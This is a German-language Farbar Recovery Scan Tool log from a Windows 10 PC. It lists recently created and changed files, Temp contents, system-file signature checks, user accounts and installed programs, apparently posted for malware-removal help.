(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)


==================== Ein Monat: Erstellte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2016-02-27 22:10 - 2016-02-27 22:10 - 00003702 _____ C:\Users\Hanns\Desktop\mbam.txt
2016-02-27 21:59 - 2016-02-27 21:59 - 00001887 _____ C:\Users\Hanns\Desktop\AdwCleaner[C1].txt
2016-02-27 21:57 - 2016-02-27 22:08 - 00192216 _____ (Malwarebytes) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2016-02-27 21:57 - 2016-02-27 21:57 - 00001178 _____ C:\Users\Public\Desktop\ Malwarebytes Anti-Malware .lnk
2016-02-27 21:57 - 2016-02-27 21:57 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ Malwarebytes Anti-Malware 
2016-02-27 21:57 - 2015-10-05 09:50 - 00109272 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbamchameleon.sys
2016-02-27 21:57 - 2015-10-05 09:50 - 00064216 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2016-02-27 21:57 - 2015-10-05 09:50 - 00025816 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbam.sys
2016-02-27 21:51 - 2016-02-27 21:57 - 22908888 _____ (Malwarebytes ) C:\Users\Hanns\Downloads\mbam-setup-2.2.0.1024.exe
2016-02-27 21:45 - 2016-02-27 21:47 - 00000000 ____D C:\AdwCleaner
2016-02-27 21:44 - 2016-02-27 21:45 - 01511936 _____ C:\Users\Hanns\Downloads\AdwCleaner_5.036.exe
2016-02-27 21:41 - 2016-02-27 21:41 - 00001344 _____ C:\Users\Hanns\Desktop\Revo Uninstaller.lnk
2016-02-27 21:41 - 2016-02-27 21:41 - 00000000 ____D C:\Users\Hanns\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Revo Uninstaller
2016-02-27 21:41 - 2016-02-27 21:41 - 00000000 ____D C:\Program Files (x86)\VS Revo Group
2016-02-27 21:40 - 2016-02-27 21:40 - 02623656 _____ (VS Revo Group Ltd.) C:\Users\Hanns\Downloads\revosetup95.exe
2016-02-27 20:08 - 2016-02-27 20:08 - 00047711 _____ C:\Users\Hanns\Downloads\Addition.txt
2016-02-27 20:07 - 2016-02-27 22:14 - 00013442 _____ C:\Users\Hanns\Downloads\FRST.txt
2016-02-27 20:07 - 2016-02-27 22:13 - 00000000 ____D C:\FRST
2016-02-27 20:05 - 2016-02-27 20:07 - 02371072 _____ (Farbar) C:\Users\Hanns\Downloads\FRST64.exe
2016-02-27 18:18 - 2016-02-27 21:57 - 00000000 ____D C:\Program Files (x86)\ Malwarebytes Anti-Malware 
2016-02-27 18:18 - 2016-02-27 18:18 - 00000000 ____D C:\ProgramData\Malwarebytes
2016-02-17 07:28 - 2016-02-17 07:30 - 00000000 ____D C:\Users\Hanns\Documents\SEGA Mega Drive Classics
2016-02-17 07:25 - 2016-02-17 07:25 - 00000222 _____ C:\Users\Hanns\Desktop\Jet Set Radio.url
2016-02-17 07:25 - 2016-02-17 07:25 - 00000222 _____ C:\Users\Hanns\Desktop\Hell Yeah!.url
2016-02-17 07:25 - 2016-02-17 07:25 - 00000221 _____ C:\Users\Hanns\Desktop\SEGA Genesis & Mega Drive Classics.url
2016-02-13 17:02 - 2016-02-13 17:02 - 00000010 _____ C:\Users\Hanns\Desktop\hng.txt
2016-02-12 13:36 - 2016-02-24 20:13 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2016-02-11 02:23 - 2016-02-11 02:23 - 00000222 _____ C:\Users\Hanns\Desktop\Rocket League.url
2016-02-11 00:20 - 2016-02-11 00:20 - 00000222 _____ C:\Users\Hanns\Desktop\TowerFall Ascension.url
2016-02-10 23:22 - 2016-02-10 23:22 - 00000222 _____ C:\Users\Hanns\Desktop\Mount Your Friends.url
2016-02-10 19:53 - 2016-02-10 19:53 - 00000000 ____D C:\Windows\SysWOW64\AGEIA
2016-02-10 19:53 - 2016-02-10 19:53 - 00000000 ____D C:\Program Files (x86)\AGEIA Technologies
2016-02-10 16:33 - 2016-02-10 16:34 - 69212943 _____ C:\Users\Hanns\Downloads\KHB70O.zip
2016-02-10 14:20 - 2013-01-26 15:30 - 00000000 ____D C:\Users\Hanns\Downloads\Bg Br Hld Be Hrd mpt
2016-02-10 13:28 - 2016-02-10 14:21 - 00000000 ____D C:\Users\Hanns\Downloads\Mick Grabham-1972 - Mick The Lad
2016-02-10 13:26 - 2016-02-10 13:27 - 00000000 ____D C:\Users\Hanns\Downloads\manassas
2016-02-09 19:40 - 2016-01-29 07:57 - 04502352 _____ (Microsoft Corporation) C:\Windows\explorer.exe
2016-02-09 19:40 - 2016-01-29 07:33 - 04064320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\explorer.exe
2016-02-09 19:40 - 2016-01-27 07:15 - 01557776 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KernelBase.dll
2016-02-09 19:40 - 2016-01-27 07:15 - 01542816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntdll.dll
2016-02-09 19:40 - 2016-01-27 07:01 - 07476064 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2016-02-09 19:40 - 2016-01-27 07:01 - 01997328 _____ (Microsoft Corporation) C:\Windows\system32\KernelBase.dll
2016-02-09 19:40 - 2016-01-27 07:01 - 01819720 _____ (Microsoft Corporation) C:\Windows\system32\ntdll.dll
2016-02-09 19:40 - 2016-01-27 06:59 - 00304752 _____ (Microsoft Corporation) C:\Windows\system32\systemreset.exe
2016-02-09 19:40 - 2016-01-27 06:57 - 02919320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2016-02-09 19:40 - 2016-01-27 06:57 - 01824264 _____ (Microsoft Corporation) C:\Windows\SysWOW64\combase.dll
2016-02-09 19:40 - 2016-01-27 06:57 - 00820704 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WinTypes.dll
2016-02-09 19:40 - 2016-01-27 06:56 - 21124344 _____ (Microsoft Corporation) C:\Windows\SysWOW64\shell32.dll
2016-02-09 19:40 - 2016-01-27 06:55 - 05242496 _____ (Microsoft Corporation) C:\Windows\SysWOW64\windows.storage.dll
2016-02-09 19:40 - 2016-01-27 06:55 - 00081112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\OpenWith.exe
2016-02-09 19:40 - 2016-01-27 06:54 - 00295264 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msv1_0.dll
2016-02-09 19:40 - 2016-01-27 06:46 - 02606824 _____ (Microsoft Corporation) C:\Windows\system32\combase.dll
2016-02-09 19:40 - 2016-01-27 06:46 - 01270072 _____ (Microsoft Corporation) C:\Windows\system32\WinTypes.dll
2016-02-09 19:40 - 2016-01-27 06:45 - 22564328 _____ (Microsoft Corporation) C:\Windows\system32\shell32.dll
2016-02-09 19:40 - 2016-01-27 06:45 - 06605544 _____ (Microsoft Corporation) C:\Windows\system32\windows.storage.dll
2016-02-09 19:40 - 2016-01-27 06:44 - 00604928 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\cng.sys
2016-02-09 19:40 - 2016-01-27 06:44 - 00085320 _____ (Microsoft Corporation) C:\Windows\system32\OpenWith.exe
2016-02-09 19:40 - 2016-01-27 06:43 - 00359776 _____ (Microsoft Corporation) C:\Windows\system32\msv1_0.dll
2016-02-09 19:40 - 2016-01-27 06:37 - 01998176 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dxgkrnl.sys
2016-02-09 19:40 - 2016-01-27 06:37 - 00576352 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dxgmms2.sys
2016-02-09 19:40 - 2016-01-27 06:21 - 00162816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msorcl32.dll
2016-02-09 19:40 - 2016-01-27 06:15 - 00031232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ztrace_maps.dll
2016-02-09 19:40 - 2016-01-27 06:13 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininetlui.dll
2016-02-09 19:40 - 2016-01-27 06:12 - 00045568 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2016-02-09 19:40 - 2016-01-27 06:11 - 00118272 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mtxoci.dll
2016-02-09 19:40 - 2016-01-27 06:10 - 22394368 _____ (Microsoft Corporation) C:\Windows\system32\edgehtml.dll
2016-02-09 19:40 - 2016-01-27 06:10 - 00099840 _____ (Microsoft Corporation) C:\Windows\SysWOW64\hlink.dll
2016-02-09 19:40 - 2016-01-27 06:08 - 00299008 _____ (Microsoft Corporation) C:\Windows\system32\microsoft-windows-system-events.dll
2016-02-09 19:40 - 2016-01-27 06:08 - 00036864 _____ (Microsoft Corporation) C:\Windows\system32\ztrace_maps.dll
2016-02-09 19:40 - 2016-01-27 06:07 - 00203264 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iassam.dll
2016-02-09 19:40 - 2016-01-27 06:05 - 19339776 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2016-02-09 19:40 - 2016-01-27 06:05 - 18678272 _____ (Microsoft Corporation) C:\Windows\SysWOW64\edgehtml.dll
2016-02-09 19:40 - 2016-01-27 06:05 - 00069632 _____ (Microsoft Corporation) C:\Windows\system32\wininetlui.dll
2016-02-09 19:40 - 2016-01-27 06:05 - 00052224 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2016-02-09 19:40 - 2016-01-27 06:04 - 09918976 _____ (Microsoft Corporation) C:\Windows\SysWOW64\twinui.dll
2016-02-09 19:40 - 2016-01-27 06:04 - 00147456 _____ (Microsoft Corporation) C:\Windows\system32\mtxoci.dll
2016-02-09 19:40 - 2016-01-27 06:03 - 00099328 _____ (Microsoft Corporation) C:\Windows\system32\ngckeyenum.dll
2016-02-09 19:40 - 2016-01-27 06:02 - 00109056 _____ (Microsoft Corporation) C:\Windows\system32\hlink.dll
2016-02-09 19:40 - 2016-01-27 06:01 - 00792064 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kerberos.dll
2016-02-09 19:40 - 2016-01-27 05:59 - 00258048 _____ (Microsoft Corporation) C:\Windows\system32\iassam.dll
2016-02-09 19:40 - 2016-01-27 05:58 - 11545088 _____ (Microsoft Corporation) C:\Windows\system32\twinui.dll
2016-02-09 19:40 - 2016-01-27 05:57 - 00764928 _____ (Microsoft Corporation) C:\Windows\system32\Chakradiag.dll
2016-02-09 19:40 - 2016-01-27 05:55 - 12125696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2016-02-09 19:40 - 2016-01-27 05:55 - 03666432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2016-02-09 19:40 - 2016-01-27 05:54 - 24603136 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2016-02-09 19:40 - 2016-01-27 05:52 - 00970752 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll
2016-02-09 19:40 - 2016-01-27 05:50 - 02230784 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2016-02-09 19:40 - 2016-01-27 05:50 - 01504768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2016-02-09 19:40 - 2016-01-27 05:50 - 00144384 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxdav.sys
2016-02-09 19:40 - 2016-01-27 05:49 - 05662208 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Chakra.dll
2016-02-09 19:40 - 2016-01-27 05:48 - 13382656 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2016-02-09 19:40 - 2016-01-27 05:44 - 00063488 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cfgbkend.dll
2016-02-09 19:40 - 2016-01-27 05:42 - 01387520 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll
2016-02-09 19:40 - 2016-01-27 05:41 - 03592704 _____ (Microsoft Corporation) C:\Windows\system32\win32kfull.sys
2016-02-09 19:40 - 2016-01-27 05:39 - 02275328 _____ (Microsoft Corporation) C:\Windows\system32\wuaueng.dll
2016-02-09 19:40 - 2016-01-27 05:38 - 07835648 _____ (Microsoft Corporation) C:\Windows\system32\Chakra.dll
2016-02-09 19:40 - 2016-01-27 05:38 - 01734656 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2016-02-09 19:40 - 2016-01-27 05:37 - 04894720 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2016-02-09 19:40 - 2016-01-27 05:36 - 02757120 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2016-02-09 19:40 - 2016-01-27 05:32 - 01087488 _____ (Microsoft Corporation) C:\Windows\system32\reseteng.dll
2016-02-09 19:40 - 2016-01-27 05:31 - 00079360 _____ (Microsoft Corporation) C:\Windows\system32\cfgbkend.dll
2016-02-09 00:33 - 2016-02-09 00:33 - 00000000 ____D C:\Users\Hanns\AppData\Roaming\fltk.org
2016-02-09 00:32 - 2016-02-09 00:44 - 00000000 ____D C:\Users\Hanns\Downloads\psx
2016-02-08 20:24 - 2016-02-08 20:25 - 00000000 ____D C:\Users\Hanns\Documents\lame enc
2016-02-08 20:19 - 2016-02-08 22:00 - 00000000 ____D C:\Users\Hanns\AppData\Roaming\AccurateRip
2016-02-08 20:19 - 2016-02-08 20:19 - 00001146 _____ C:\Users\Public\Desktop\Exact Audio Copy.lnk
2016-02-08 20:19 - 2016-02-08 20:19 - 00000000 ____D C:\Users\Hanns\AppData\Roaming\EAC
2016-02-08 20:19 - 2016-02-08 20:19 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Exact Audio Copy
2016-02-08 20:19 - 2016-02-08 20:19 - 00000000 ____D C:\Program Files (x86)\Exact Audio Copy
2016-02-08 20:18 - 2016-02-08 20:18 - 01466656 _____ C:\Users\Hanns\Downloads\Exact Audio Copy - CHIP-Installer.exe
2016-02-06 13:14 - 2016-02-06 13:15 - 00000000 ____D C:\Users\Hanns\Documents\Rayman Legends
2016-02-06 13:11 - 2016-02-06 13:12 - 66007832 _____ (Ubisoft) C:\Users\Hanns\Downloads\UplayInstaller.exe
2016-02-06 08:40 - 2016-02-06 08:40 - 00000222 _____ C:\Users\Hanns\Desktop\Rayman Legends.url
2016-02-06 01:26 - 2016-02-06 01:26 - 00000000 ____D C:\Users\Hanns\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\GameSpy Arcade
2016-02-06 01:26 - 2016-02-06 01:26 - 00000000 ____D C:\Program Files (x86)\GameSpy Arcade
2016-02-05 22:08 - 2016-02-05 22:08 - 00000222 _____ C:\Users\Hanns\Desktop\SOMA.url
2016-02-05 22:08 - 2016-02-05 22:08 - 00000221 _____ C:\Users\Hanns\Desktop\Painkiller Black Edition.url
2016-02-05 20:29 - 2016-02-06 13:12 - 00001281 _____ C:\Users\Hanns\Desktop\Uplay.lnk
2016-02-05 20:29 - 2016-02-05 20:29 - 00000000 ____D C:\Users\Hanns\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Ubisoft
2016-02-05 20:28 - 2016-02-06 13:20 - 00000000 ____D C:\Users\Hanns\AppData\Local\Ubisoft Game Launcher
2016-02-05 20:28 - 2016-02-05 20:28 - 00000000 ____D C:\Program Files (x86)\Ubisoft
2016-02-04 15:37 - 2016-02-05 12:43 - 00000000 ____D C:\Users\Hanns\Documents\Witcher 2
2016-02-04 15:37 - 2016-02-04 15:37 - 00000000 ____D C:\Users\Hanns\AppData\Local\The Witcher 2
2016-02-03 22:33 - 2016-02-03 22:33 - 00000000 ____D C:\Users\Hanns\AppData\Local\nuclearthrone
2016-02-03 21:57 - 2016-02-03 22:27 - 00000000 ____D C:\Users\Hanns\AppData\Roaming\Bioshock
2016-02-03 21:57 - 2016-02-03 22:22 - 00000000 ____D C:\Users\Hanns\Documents\Bioshock
2016-02-02 23:59 - 2016-02-02 23:59 - 00000221 _____ C:\Users\Hanns\Desktop\The Witcher 2 Assassins of Kings Enhanced Edition.url
2016-02-02 23:56 - 2016-02-02 23:56 - 00000222 _____ C:\Users\Hanns\Desktop\Viscera Cleanup Detail Shadow Warrior.url
2016-02-02 09:51 - 2016-02-02 09:52 - 00000000 ____D C:\Users\Hanns\Documents\Hard Reset Extended
2016-02-02 08:51 - 2016-02-02 08:51 - 00000221 _____ C:\Users\Hanns\Desktop\Hard Reset.url
2016-02-01 21:50 - 2016-02-01 21:51 - 00000000 ____D C:\Users\Hanns\Documents\Shadow Warrior
2016-02-01 08:06 - 2016-02-27 19:06 - 00000000 ____D C:\Users\Hanns\Downloads\programme
2016-02-01 07:56 - 2016-02-10 23:01 - 00002271 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2016-02-01 07:56 - 2016-02-10 23:01 - 00002259 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2016-02-01 07:55 - 2016-02-27 22:07 - 00001136 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2016-02-01 07:55 - 2016-02-27 22:00 - 00001140 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2016-02-01 07:55 - 2016-02-01 12:48 - 00000000 ____D C:\Users\Hanns\AppData\Local\Google
2016-02-01 07:55 - 2016-02-01 07:56 - 00000000 ____D C:\Program Files (x86)\Google
2016-02-01 07:55 - 2016-02-01 07:55 - 00004198 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2016-02-01 07:55 - 2016-02-01 07:55 - 00003966 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2016-01-31 22:12 - 2016-01-31 22:13 - 00000000 ____D C:\Users\Hanns\Documents\Shadow Warrior DX11
2016-01-31 19:33 - 2016-01-31 19:33 - 00000222 _____ C:\Users\Hanns\Desktop\Shadow Warrior.url
2016-01-31 16:22 - 2016-01-31 16:22 - 00001125 _____ C:\Users\Hanns\Desktop\Project64.exe - Verknüpfung.lnk
2016-01-31 15:41 - 2016-01-31 16:01 - 00000000 ____D C:\Program Files (x86)\Project64 1.6
2016-01-31 15:41 - 2016-01-31 15:41 - 00000000 ____D C:\Users\Hanns\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\project64 1.6
2016-01-30 23:28 - 2016-01-30 23:28 - 00000222 _____ C:\Users\Hanns\Desktop\Street Fighter V Beta.url
2016-01-30 22:15 - 2016-01-30 22:16 - 00000000 ____D C:\Users\Hanns\Documents\Shadow Warrior Demo

==================== Ein Monat: Geänderte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2016-02-27 22:07 - 2015-12-16 21:34 - 00000000 ____D C:\Program Files (x86)\Steam
2016-02-27 22:07 - 2015-12-16 20:39 - 00000180 _____ C:\Windows\system32\{A6D608F0-0BDE-491A-97AE-5C4B05D86E01}.bat
2016-02-27 22:06 - 2015-12-21 22:42 - 00000000 ____D C:\ProgramData\NVIDIA
2016-02-27 22:06 - 2015-11-05 21:07 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2016-02-27 22:06 - 2015-10-30 08:21 - 00000000 ____D C:\Windows\INF
2016-02-27 22:06 - 2015-10-30 07:28 - 00262144 ___SH C:\Windows\system32\config\BBI
2016-02-27 21:55 - 2015-12-31 12:07 - 00000884 _____ C:\Windows\Tasks\Adobe Flash Player Updater.job
2016-02-27 20:02 - 2015-11-05 21:20 - 00000000 ____D C:\ProgramData\Package Cache
2016-02-27 19:23 - 2015-10-30 08:24 - 00000000 ___HD C:\Program Files\WindowsApps
2016-02-27 19:23 - 2015-10-30 08:24 - 00000000 ____D C:\Windows\AppReadiness
2016-02-27 19:07 - 2015-12-16 20:40 - 00000000 ____D C:\Users\Hanns
2016-02-27 18:59 - 2015-10-30 08:24 - 00000000 ____D C:\Windows\registration
2016-02-27 14:09 - 2015-12-18 21:35 - 00000000 ____D C:\Users\Hanns\AppData\Local\CrashDumps
2016-02-27 12:03 - 2015-12-24 14:58 - 00000000 ____D C:\Users\Hanns\AppData\Local\Spotify
2016-02-24 20:13 - 2015-12-16 21:31 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2016-02-19 00:25 - 2015-12-23 08:32 - 00000000 ___RD C:\Users\Hanns\Desktop\Podcast
2016-02-17 07:49 - 2015-12-18 22:04 - 00000000 ____D C:\Users\Hanns\Documents\SavedGames
2016-02-17 07:25 - 2015-12-16 21:55 - 00000000 ____D C:\Users\Hanns\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam
2016-02-14 15:39 - 2015-12-24 14:57 - 00000000 ____D C:\Users\Hanns\AppData\Roaming\Spotify
2016-02-13 18:46 - 2016-01-08 18:05 - 00000000 ____D C:\Users\Hanns\AppData\Roaming\vlc
2016-02-13 18:19 - 2016-01-22 09:55 - 00000000 ____D C:\Users\Hanns\AppData\Roaming\MusicBee
2016-02-12 05:38 - 2015-11-05 21:11 - 01802588 _____ C:\Windows\system32\PerfStringBackup.INI
2016-02-12 05:38 - 2015-11-05 20:38 - 00776562 _____ C:\Windows\system32\perfh007.dat
2016-02-12 05:38 - 2015-11-05 20:38 - 00155874 _____ C:\Windows\system32\perfc007.dat
2016-02-11 22:59 - 2015-10-30 08:24 - 00000000 ____D C:\Windows\rescache
2016-02-11 19:27 - 2015-12-16 20:43 - 00002390 _____ C:\Users\Hanns\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2016-02-11 19:27 - 2015-12-16 20:43 - 00000000 ___RD C:\Users\Hanns\OneDrive
2016-02-11 12:11 - 2015-11-05 21:07 - 00000000 __RHD C:\Users\Public\AccountPictures
2016-02-11 06:25 - 2015-10-30 10:07 - 00000000 ____D C:\Program Files\Windows Journal
2016-02-11 03:00 - 2015-12-21 23:36 - 00000000 ____D C:\Users\Hanns\Documents\My Games
2016-02-10 19:53 - 2015-12-21 22:45 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NVIDIA Corporation
2016-02-09 23:50 - 2015-12-16 20:59 - 00000000 ____D C:\Windows\system32\MRT
2016-02-09 23:47 - 2015-12-16 20:59 - 146614896 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe
2016-02-09 23:47 - 2015-10-30 08:11 - 00000000 ____D C:\Windows\CbsTemp
2016-02-09 08:29 - 2015-10-30 08:24 - 00000000 ____D C:\Windows\LiveKernelReports
2016-02-06 21:32 - 2016-01-08 18:05 - 00000000 ____D C:\Users\Hanns\AppData\Roaming\dvdcss
2016-02-04 00:29 - 2016-01-01 18:41 - 00001515 _____ C:\Users\Hanns\Desktop\RealTemp - Verknüpfung.lnk
2016-02-03 20:01 - 2015-10-30 08:26 - 00828920 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2016-02-03 20:01 - 2015-10-30 08:26 - 00176632 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2016-01-31 15:43 - 2015-12-16 20:41 - 00000000 ____D C:\Users\Hanns\AppData\Local\VirtualStore
2016-01-29 03:30 - 2015-10-30 08:24 - 00000000 ___SD C:\Windows\system32\F12
2016-01-29 03:30 - 2015-10-30 08:24 - 00000000 ___RD C:\Windows\PurchaseDialog
2016-01-29 03:30 - 2015-10-30 08:24 - 00000000 ___RD C:\Windows\ImmersiveControlPanel
2016-01-29 03:30 - 2015-10-30 08:24 - 00000000 ____D C:\Windows\system32\WinBioPlugIns
2016-01-29 03:30 - 2015-10-30 08:24 - 00000000 ____D C:\Windows\system32\oobe
2016-01-29 03:30 - 2015-10-30 08:24 - 00000000 ____D C:\Windows\system32\appraiser
2016-01-29 03:30 - 2015-10-30 08:24 - 00000000 ____D C:\Windows\bcastdvr

==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse =======

2015-12-10 13:26 - 2015-12-10 13:26 - 0000000 ____H () C:\ProgramData\DP45977C.lfl

Einige Dateien in TEMP:
====================
C:\Users\Hanns\AppData\Local\Temp\avgnt.exe
C:\Users\Hanns\AppData\Local\Temp\comver.dll
C:\Users\Hanns\AppData\Local\Temp\nvSCPAPI64.dll
C:\Users\Hanns\AppData\Local\Temp\nvStInst.exe
C:\Users\Hanns\AppData\Local\Temp\sqlite3.dll


==================== Bamital & volsnap =================

(Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.)

C:\Windows\system32\winlogon.exe => Datei ist digital signiert
C:\Windows\system32\wininit.exe => Datei ist digital signiert
C:\Windows\explorer.exe => Datei ist digital signiert
C:\Windows\SysWOW64\explorer.exe => Datei ist digital signiert
C:\Windows\system32\svchost.exe => Datei ist digital signiert
C:\Windows\SysWOW64\svchost.exe => Datei ist digital signiert
C:\Windows\system32\services.exe => Datei ist digital signiert
C:\Windows\system32\User32.dll => Datei ist digital signiert
C:\Windows\SysWOW64\User32.dll => Datei ist digital signiert
C:\Windows\system32\userinit.exe => Datei ist digital signiert
C:\Windows\SysWOW64\userinit.exe => Datei ist digital signiert
C:\Windows\system32\rpcss.dll => Datei ist digital signiert
C:\Windows\system32\dnsapi.dll => Datei ist digital signiert
C:\Windows\SysWOW64\dnsapi.dll => Datei ist digital signiert
C:\Windows\system32\Drivers\volsnap.sys => Datei ist digital signiert


LastRegBack: 2016-02-24 20:26

==================== Ende von FRST.txt ============================
         
Addition.txt
Code:
ATTFilter
Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version:27-02-2016
durchgeführt von Hanns (2016-02-27 22:14:21)
Gestartet von C:\Users\Hanns\Downloads
Windows 10 Home Version 1511 (X64) (2015-12-16 19:39:02)
Start-Modus: Normal
==========================================================


==================== Konten: =============================

Administrator (S-1-5-21-15253450-2137153623-3730132983-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-15253450-2137153623-3730132983-503 - Limited - Disabled)
Gast (S-1-5-21-15253450-2137153623-3730132983-501 - Limited - Disabled)
Hanns (S-1-5-21-15253450-2137153623-3730132983-1001 - Administrator - Enabled) => C:\Users\Hanns

==================== Sicherheits-Center ========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)

AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installierte Programme ======================

(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)

Adobe Flash Player 20 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 20.0.0.306 - Adobe Systems Incorporated)
Alien: Isolation (HKLM-x32\...\Steam App 214490) (Version:  - Creative Assembly)
Astebreed (HKLM-x32\...\Steam App 283680) (Version:  - Edelweiss)
BioShock (HKLM-x32\...\Steam App 7670) (Version:  - 2K Boston)
BioShock 2 (HKLM-x32\...\Steam App 8850) (Version:  - 2K Marin)
BioShock Infinite (HKLM-x32\...\Steam App 8870) (Version:  - Irrational Games)
Brütal Legend (HKLM-x32\...\Steam App 225260) (Version:  - Double Fine Productions)
Chivalry: Medieval Warfare (HKLM-x32\...\Steam App 219640) (Version:  - Torn Banner Studios)
CPUID CPU-Z MSI 1.74 (HKLM\...\CPUID CPU-Z MSI_is1) (Version: 1.74 - CPUID, Inc.)
Dark Souls: Prepare to Die Edition (HKLM-x32\...\Steam App 211420) (Version:  - FromSoftware)
DARK SOULS™ II: Scholar of the First Sin (HKLM-x32\...\Steam App 335300) (Version:  - FromSoftware, Inc)
Darkest Dungeon (HKLM-x32\...\Steam App 262060) (Version:  - Red Hook Studios)
Darksiders (HKLM-x32\...\Steam App 50620) (Version:  - Vigil Games)
DarksidersInstaller (HKLM-x32\...\{B93EEE50-9C8F-45DF-95E4-3D85A6E242F3}) (Version: 1.00.1000 - Ihr Firmenname)
Dead Space (HKLM-x32\...\Steam App 17470) (Version:  - EA Redwood Shores)
Don't Starve (HKLM-x32\...\Steam App 219740) (Version:  - Klei Entertainment)
Dragon's Dogma: Dark Arisen (HKLM-x32\...\Steam App 367500) (Version:  - Capcom)
Exact Audio Copy 1.1 (HKLM-x32\...\Exact Audio Copy) (Version: 1.1 - Andre Wiethoff)
GameSpy Arcade (HKLM-x32\...\GameSpy Arcade) (Version:  - )
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 48.0.2564.109 - Google Inc.)
Google Update Helper (x32 Version: 1.3.29.5 - Google Inc.) Hidden
Guacamelee! Super Turbo Championship Edition (HKLM-x32\...\Steam App 275390) (Version:  - DrinkBox Studios)
Hard Reset (HKLM-x32\...\Steam App 98400) (Version:  - Flying Wild Hog)
Hell Yeah! (HKLM-x32\...\Steam App 205230) (Version:  - Arkedo)
Ikaruga (HKLM-x32\...\Steam App 253750) (Version:  - Treasure)
Intel(R) Chipset Device Software (x32 Version: 10.0.27 - Intel(R) Corporation) Hidden
Intel(R) Management Engine Components (HKLM\...\{1CEAC85D-2590-4760-800F-8DE5E91F3700}) (Version: 11.0.0.1158 - Intel Corporation)
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.15.4279 - Intel Corporation)
Intel(R) Rapid Storage Technology (HKLM\...\{409CB30E-E457-4008-9B1A-ED1B9EA21140}) (Version: 14.5.0.1081 - Intel Corporation)
Intel® Security Assist (HKLM-x32\...\{4B230374-6475-4A73-BA6E-41015E9C5013}) (Version: 1.0.0.532 - Intel Corporation)
